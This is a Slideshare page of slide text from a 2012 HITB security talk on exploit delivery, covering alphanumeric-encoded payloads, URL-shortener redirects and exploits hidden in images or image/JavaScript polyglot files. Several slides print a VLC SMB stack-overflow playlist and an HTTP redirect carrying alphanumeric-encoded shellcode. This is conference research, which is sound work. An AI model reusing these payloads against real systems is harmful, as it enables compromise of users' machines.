Innovative Exploit Delivery

33 %
67 %
Information about Innovative Exploit Delivery
Technology

Published on October 11, 2012

Author: saumilshah

Source: slideshare.net

Description

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAHnet-square HITB2012KUL

# who am iSaumil Shah, CEO Net-Square.• Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.• M.S. Computer Science Purdue University.• saumil@net-square.com• LinkedIn: saumilshah• Twitter: @therealsaumilnet-square

My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open"net-square

When two forces combine... Web Binary Hacking Exploitsnet-square

SNEAKY LETHALnet-square

net-square

302 IMG JS HTML5net-square

net-square

VLC smb overflow• smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}• Classic Stack Overflow.net-square

VLC XSPF file<?xml version="1.0" encoding="UTF-8"?><playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList></playlist> net-square

Alpha Encoded Tiny ZOMFG Exploit URLnet-square

100% Pure Alphanum!net-square

VLC smb overflow - HTMLized!!<embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square

301 Redirect from tinyurlHTTP/1.1 301 Moved PermanentlyX-Powered-By: PHP/5.2.12Location:smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA}Content-type: text/htmlContent-Length: 0Connection: closeServer: TinyURL/1.6 net-square

net-square

Exploits as Images - 1• Grayscale encoding (0-255).• 1 pixel = 1 character.• Perfectly valid image.• Decode and Execute!net-square

net-square

Im an evil Javascript Im an innocent imagenet-square

<CANVAS>net-square

net-square c) no eval()

Same Same No Different! var a = eval(str); a = (new Function(str))();net-square

d) IMAJSnet-square

IMAJS Seeing is Believingnet-square

Browser Support for IMAJS-GIFHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -net-square

Browser Support for IMAJS-BMPHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -net-square

e) The αq exploitnet-square

Encode using Alpha channelnet-square

Demo IMAJS αq FTW!net-square

f) ONE LAST DEMO!!! net-square

The FUTURE? HTML5 Video SVG WebGL Mobile Browsersnet-square

KTHXBAI See you in 2013??net-square saumil@net-square.com | @therealsaumil

Add a comment

Related presentations

Related pages

HITBSECCONF2012 - MALAYSIA

PRESENTATION TITLE: Innovative Approaches to Exploit Delivery PRESENTATION ABSTRACT: Behind every successful exploit is a good delivery mechanism.
Read more

Innovative Service Delivery - OECD.org

Innovative Service Delivery Meeting the Challenges of Rural Regions OECD Rural Policy Conferences Key Messages Cologne, Germany April 3-4, 2008
Read more

#HITB2012KUL D2T2 - Saumil Shah - Innovative Approaches to ...

... Innovative Approaches to Exploit Delivery ... bringing you a slew of creative and innovative tricks and techniques to send exploits ...
Read more

Innovative Approaches To Exploit Delivery - Securitytube

Description: PRESENTATION ABSTRACT: Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing ...
Read more

Innovate UK - GOV.UK

Innovate UK is the UK’s innovation ... Innovative organisations can apply for a share of up to £3 million to develop new ways of detecting explosives ...
Read more

Stegosploit: Hacking With Pictures « HITBSecConf2015 ...

A good exploit is one that is delivered in style”. My work over the past couple of years involves exploring new and innovative means of exploit delivery ...
Read more

D2T2 – Saumil Shah – Innovative Approaches to Exploit ...

D2T2 – Saumil Shah – Innovative Approaches to Exploit ...
Read more

List - Hack.lu 2010

1.18 Exploit Delivery ... List of Talks Keynote: Catching that butterfly. In May 2009, Defence Intelligence announced the discovery of a new botnet, ...
Read more